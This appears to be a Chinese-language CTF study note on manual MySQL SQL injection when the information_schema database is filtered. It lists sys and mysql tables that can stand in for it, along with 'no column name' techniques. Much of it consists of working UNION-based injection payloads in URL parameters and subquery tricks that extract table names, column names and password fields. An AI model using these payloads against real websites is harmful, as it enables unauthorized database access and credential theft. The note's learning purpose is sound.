information_schema过滤与无列名注入

前言:

做题时 遇到了些问题,所以记录下笔记。

在手工SQL注入时 information_schema 库 被过滤了怎么办?

正文:

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。

那么有没有代替information_schema的呢?

在 Mysql 5.7 版本中新增了 sys.schema , 基础数据 来自于 performance_schema和information_sche两个库中,其本身并不存储数据。

information_schema过滤与无列名注入_第1张图片

information_schema过滤与无列名注入_第2张图片所以 就有了几个可以代替 information_schema 注入的作用,

 查询表的统计信息,其中还包括Innodb缓冲池统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间)降序排序

sys.schema_table_statistics_with_buffer
sys.x$schema_table_statistics_with_buffer

 但是 sys.schema_auto_increment_columns 这个库有点局限 需要root 才能访问。

类似的,可以利用的表还有 :

mysql.innodb_table_statsmysql.innodb_table_index同样存放有库名表名

information_schema过滤与无列名注入_第3张图片

 成功查询到。

总结一下:

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

均可代替 information_schema

无列名注入:

上面的方法 可以读取到数据库 和 表名, 但是列名我们改怎么读取。

利用 join-using 注列名。

通过系统关键字 join 可建立两表之间的内连接,通过对想要查询列名所在的表与其自身

爆表名
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+

爆字段名
获取第一列的字段名及后面每一列字段名
?id=-1' union select*from (select * from users as a join users as b)as c--+
?id=-1' union select*from (select * from users as a join users b using(id,username))c--+
?id=-1' union select*from (select * from users as a join users b using(id,username,password))c--+

数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。

information_schema过滤与无列名注入_第4张图片

 

正常查询

information_schema过滤与无列名注入_第5张图片

 select 1,2,3,4,5 union select * from users;
无列名注入关键 就是要猜测表里有多少个列,要一一对应上,上面例子是有5个列
1,2,3,4,5 的作用就是对列起别名,替换为后面无列名注入做准备

information_schema过滤与无列名注入_第6张图片

 接着就可以使用数字来对应列进行查询,如3对应了表里面的pass
select `3` from (select 1,2,3,4,5 union select * from users)as a;
就相当于select pass from (select 1,2,3,4,5 union select * from users)as a;
SQL 中反引号是可以代表数据库名和列名的
(select 1,2,3,4,5 union select * from users)as a 把括号里的查询数据重命名一张新的表 a,在从中查询
information_schema过滤与无列名注入_第7张图片

 当反引号被禁用时,就可以使用起别名的方法来代替
select b from (select 1,2, 3 as b ,4,5 union select * from users)as a;
在注入时同时查询多个列
select group_concat(b,c) from (select 1,2, 3 as b , 4 as c ,5 union select * from users)as a;
information_schema过滤与无列名注入_第8张图片

 

你可能感兴趣的:(CTF,web安全,数据库,mysql,sql)